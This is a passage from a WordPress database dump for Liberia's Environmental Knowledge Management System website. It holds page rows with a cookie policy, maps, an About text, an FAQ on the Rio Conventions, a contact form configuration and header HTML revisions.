subscribed/unsubscribed users.</p></li><li><p>Forms related cookies</p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.</p></li><li><p>Site preferences cookies</p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.</p></li></ul><h2><strong>Third Party Cookies</strong></h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.</p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.</p><p>For more information on Google Analytics cookies, see the official Google Analytics page.</p></li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.</p></li><li><p>We also use social media buttons and/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.</p></li></ul><p><strong>More Information</strong></p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site. </p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:</p><ul><li>Email: <a href=\"mailto:contact@ekmsliberia.info\">contact@ekmsliberia.info</a></li></ul>','Cookies Privacy Policy','','publish','closed','closed','','cookies-privacy-policy','','','2019-11-09 07:53:23','2019-11-09 07:53:23','',0,'https://ekmsliberia.info/?page_id=102',0,'page','',0),(103,1,'2019-11-08 07:02:46','2019-11-08 07:02:46','','Cookies Privacy Policy','','inherit','closed','closed','','102-revision-v1','','','2019-11-08 07:02:46','2019-11-08 07:02:46','',102,'https://ekmsliberia.info/2019/11/08/102-revision-v1/',0,'revision','',0),(106,1,'2019-11-08 07:03:40','2019-11-08 07:03:40','','Terms of use','','publish','closed','closed','','terms-of-use','','','2019-11-08 07:03:41','2019-11-08 07:03:41','',0,'https://ekmsliberia.info/?page_id=106',0,'page','',0),(107,1,'2019-11-08 07:03:40','2019-11-08 07:03:40','','Terms of use','','inherit','closed','closed','','106-revision-v1','','','2019-11-08 07:03:40','2019-11-08 07:03:40','',106,'https://ekmsliberia.info/2019/11/08/106-revision-v1/',0,'revision','',0),(108,1,'2019-11-08 07:04:02','2019-11-08 07:04:02','<!-- wp:paragraph -->\n<p> Coming soon! </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"ids\":[2946]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-1024x791.jpg\" alt=\"\" data-id=\"2946\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Land-Cover-Map-2015-1-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-land-cover-map-2015-1/\" class=\"wp-image-2946\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong>Liberia Land Cover Map</strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"ids\":[2947]} -->\n<figure class=\"wp-block-gallery columns-1 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-1024x791.jpg\" alt=\"\" data-id=\"2947\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-scaled.jpg\" data-link=\"https://ekmsliberia.info/maps/liberia-species-richness-high-biodiversity-corridor-map2/\" class=\"wp-image-2947\"/></figure></li></ul><figcaption class=\"blocks-gallery-caption\"><strong> Liberia Species Richness Map </strong></figcaption></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":2948} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/12/Liberia-Extreme-Poverty-Map-1-1024x791.jpg\" alt=\"\" class=\"wp-image-2948\"/><figcaption><strong>Liberia Extreme Poverty Map by Region (HIES 2014)</strong></figcaption></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:jetpack/map {\"points\":[{\"placeTitle\":\"Liberia\",\"title\":\"Liberia\",\"caption\":\"Liberia\",\"id\":\"country.11981004792290980\",\"coordinates\":{\"longitude\":-9.75,\"latitude\":6.53333}}],\"zoom\":11.292581973058338} -->\n<div class=\"wp-block-jetpack-map\" data-map-style=\"default\" data-map-details=\"true\" data-points=\"[{&quot;placeTitle&quot;:&quot;Liberia&quot;,&quot;title&quot;:&quot;Liberia&quot;,&quot;caption&quot;:&quot;Liberia&quot;,&quot;id&quot;:&quot;country.11981004792290980&quot;,&quot;coordinates&quot;:{&quot;longitude&quot;:-9.75,&quot;latitude&quot;:6.53333}}]\" data-zoom=\"11.292581973058338\" data-map-center=\"{&quot;longitude&quot;:-122.41941550000001,&quot;latitude&quot;:37.7749295}\" data-marker-color=\"red\"><ul><li><a href=\"https://www.google.com/maps/search/?api=1&amp;query=6.53333,-9.75\">Liberia</a></li></ul></div>\n<!-- /wp:jetpack/map -->','Maps','','publish','closed','closed','','maps','','','2019-12-24 13:25:57','2019-12-24 13:25:57','',0,'https://ekmsliberia.info/?page_id=108',0,'page','',0),(109,1,'2019-11-08 07:04:02','2019-11-08 07:04:02','','Maps','','inherit','closed','closed','','108-revision-v1','','','2019-11-08 07:04:02','2019-11-08 07:04:02','',108,'https://ekmsliberia.info/2019/11/08/108-revision-v1/',0,'revision','',0),(110,1,'2019-11-08 07:04:52','2019-11-08 07:04:52','','Events','','publish','closed','closed','','events','','','2019-11-08 07:04:54','2019-11-08 07:04:54','',0,'https://ekmsliberia.info/?page_id=110',0,'page','',0),(111,1,'2019-11-08 07:04:52','2019-11-08 07:04:52','','Events','','inherit','closed','closed','','110-revision-v1','','','2019-11-08 07:04:52','2019-11-08 07:04:52','',110,'https://ekmsliberia.info/2019/11/08/110-revision-v1/',0,'revision','',0),(114,1,'2022-08-22 10:08:38','2019-11-08 07:13:01','','About EKMS','','publish','closed','closed','','114','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=114',8,'nav_menu_item','',0),(115,1,'2022-08-22 10:08:38','2019-11-08 07:13:01','','News & Blogs','','publish','closed','closed','','115','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=115',11,'nav_menu_item','',0),(116,1,'2022-08-22 10:08:38','2019-11-08 07:13:01',' ','','','publish','closed','closed','','116','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=116',18,'nav_menu_item','',0),(117,1,'2022-08-22 10:08:37','2019-11-08 07:13:01','','Explore All Topics','','publish','closed','closed','','117','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=117',4,'nav_menu_item','',0),(118,1,'2022-08-22 10:08:38','2019-11-08 07:13:01',' ','','','publish','closed','closed','','118','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=118',9,'nav_menu_item','',0),(120,1,'2022-08-22 10:08:37','2019-11-08 07:13:01','','Explore All Documents','','publish','closed','closed','','120','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=120',7,'nav_menu_item','',0),(123,1,'2022-08-22 10:08:37','2019-11-08 07:13:01','','Explore All Institutions','','publish','closed','closed','','123','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=123',5,'nav_menu_item','',0),(124,1,'2022-08-22 10:08:38','2019-11-08 07:13:01',' ','','','publish','closed','closed','','124','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=124',14,'nav_menu_item','',0),(125,1,'2022-08-22 10:08:37','2019-11-08 07:13:01',' ','','','publish','closed','closed','','125','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=125',3,'nav_menu_item','',0),(126,1,'2022-08-22 10:08:38','2019-11-08 07:13:01',' ','','','publish','closed','closed','','126','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=126',12,'nav_menu_item','',0),(127,1,'2022-08-22 10:08:37','2019-11-08 07:13:00','','Knowledge Resources','','publish','closed','closed','','knowledge-resources','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=127',2,'nav_menu_item','',0),(129,1,'2022-08-22 10:08:38','2019-11-08 07:13:01','','Media & Tools','','publish','closed','closed','','media','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=129',10,'nav_menu_item','',0),(151,1,'2019-11-08 08:29:07','2019-11-08 08:29:07','<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-08 08:29:07','2019-11-08 08:29:07','',68,'https://ekmsliberia.info/2019/11/08/68-revision-v1/',0,'revision','',0),(258,1,'2019-11-08 12:22:43','2019-11-08 12:22:43','','home_4','','inherit','open','closed','','home_4','','','2019-11-08 12:22:43','2019-11-08 12:22:43','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/home_4.jpg',0,'attachment','image/jpeg',0),(297,1,'2017-08-29 00:35:34','2017-08-29 00:35:34','https://ekmsliberia.info/wp-content/uploads/2017/08/cropped-favicon.png','cropped-favicon.png','','inherit','open','closed','','cropped-favicon-png','','','2017-08-29 00:35:34','2017-08-29 00:35:34','',0,'https://ekmsliberia.info/wp-content/uploads/2017/08/cropped-favicon.png',0,'attachment','image/png',0),(335,1,'2019-10-30 14:57:21','2019-10-30 14:57:21','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implemented in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discuss on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n												<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n					<p>Use the smart search feature on the homepage to search for keywords or better still select a category.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','publish','closed','closed','','frequently-asked-questions','','','2019-11-18 14:40:14','2019-11-18 14:40:14','',0,'https://ekmsliberia.info/?page_id=335',0,'page','',0),(337,1,'2019-11-08 14:25:58','2019-11-08 14:25:58','/* Hide header button from 1024pxpx */\n@media (max-width: 1024px) {\n	.hide-1024.elementor-column {\n		display: none;\n	}\n}\n\n/* Color of the footer newsletter form */\n#footer .oceanwp-newsletter-form-wrap input[type=\"email\"] {\n	color: #fff;\n}','oceanwp','','publish','closed','closed','','oceanwp-2','','','2019-11-08 14:25:58','2019-11-08 14:25:58','',0,'https://ekmsliberia.info/2019/11/08/oceanwp-2/',0,'custom_css','',0),(338,1,'2019-11-08 14:25:58','2019-11-08 14:25:58','/* Hide header button from 1024pxpx */\n@media (max-width: 1024px) {\n	.hide-1024.elementor-column {\n		display: none;\n	}\n}\n\n/* Color of the footer newsletter form */\n#footer .oceanwp-newsletter-form-wrap input[type=\"email\"] {\n	color: #fff;\n}','oceanwp','','inherit','closed','closed','','337-revision-v1','','','2019-11-08 14:25:58','2019-11-08 14:25:58','',337,'https://ekmsliberia.info/2019/11/08/337-revision-v1/',0,'revision','',0),(339,1,'2019-11-08 14:26:03','2019-11-08 14:26:03','{\"id\":339,\"field_id\":5,\"fields\":{\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"simple\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"simple_placeholder\":\"Your Name *\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"label_hide\":\"1\",\"css\":\"wpforms-one-half wpforms-first\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"Your Email *\",\"confirmation_placeholder\":\"\",\"label_hide\":\"1\",\"default_value\":\"\",\"css\":\"wpforms-one-half\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"Your Phone Number\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"Your Phone Number *\",\"label_hide\":\"1\",\"default_value\":\"\",\"css\":\"wpforms-one-half wpforms-first\",\"input_mask\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Date and Time to Call\",\"description\":\"\",\"size\":\"large\",\"placeholder\":\"Date and Time to Call\",\"label_hide\":\"1\",\"default_value\":\"\",\"css\":\"wpforms-one-half\",\"input_mask\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"What is the nature of your appointment?\",\"label_hide\":\"1\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Send Your Request\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"{field_id=\\\"0\\\"}\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"169\",\"redirect\":\"\"}}},\"meta\":{\"template\":\"contact\"}}','Simple Contact Form','','publish','closed','closed','','339','','','2019-11-08 14:26:03','2019-11-08 14:26:03','',0,'https://ekmsliberia.info/?post_type=wpforms&#038;p=339',0,'wpforms','',0),(345,1,'2019-11-08 14:44:20','2019-11-08 14:44:20','\n		<a href=\"https://medical.oceanwp.org/\" rel=\"home\" itemprop=\"url\"><img width=\"169\" height=\"50\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/logo.png\" alt=\"Medical\" itemprop=\"logo\" /></a><a href=\"https://medical.oceanwp.org/\" rel=\"home\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/retina-logo.png\" width=\"338\" height=\"100\" alt=\"\" style=\"max-height: 50px\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n				<h3>\n					Street Name, FL 54785\n				</h3>\n				<p>Visit our Location</p>\n				<h3>\n					(01) 54 214 951 47\n				</h3>\n				<p>Call us Anytime</p>\n			<a href=\"/contact-us/\">\n						Make an Appointment\n					</a>\n		<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n			<ul id=\"menu-main-menu\"><li  id=\"menu-item-38\"><a href=\"https://medical.oceanwp.org/\">Home</a></li><li  id=\"menu-item-51\"><a href=\"#\">About Us</a></li><li  id=\"menu-item-52\"><a href=\"#\">Departments</a></li><li  id=\"menu-item-37\"><a href=\"https://medical.oceanwp.org/blog/\">Blog</a></li><li  id=\"menu-item-36\"><a href=\"https://medical.oceanwp.org/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n		</nav><!-- #site-navigation -->\n			<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n					</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main-menu-1\"><li><a href=\"https://medical.oceanwp.org/\">Home</a></li>\n<li><a href=\"#\">About Us</a></li>\n<li><a href=\"#\">Departments</a></li>\n<li><a href=\"https://medical.oceanwp.org/blog/\">Blog</a></li>\n<li><a href=\"https://medical.oceanwp.org/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>\n			<form method=\"get\" id=\"searchform\" action=\"https://medical.oceanwp.org/\">\n				<input type=\"text\" name=\"s\" id=\"s\" placeholder=\"Type your search...\">\n				<button type=\"submit\" value=\"\"></button>\n							</form>\n		','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:44:20','2019-11-08 14:44:20','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(346,1,'2019-11-08 14:44:22','2019-11-08 14:44:22','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n				<h3>\n					Street Name, FL 54785\n				</h3>\n								<p>Visit our Location</p>\n				<h3>\n					(01) 54 214 951 47\n				</h3>\n								<p>Call us Anytime</p>\n			<a href=\"/contact-us/\" role=\"button\">\n						Make an Appointment\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:c&#111;nta&#99;&#116;&#64;ek&#109;sli&#98;e&#114;&#105;&#97;.i&#110;&#102;o\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:44:22','2019-11-08 14:44:22','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(348,1,'2019-11-08 14:49:32','2019-11-08 14:49:32','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<a href=\"/contact-us/\" role=\"button\">\n						Make an Appointment\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a 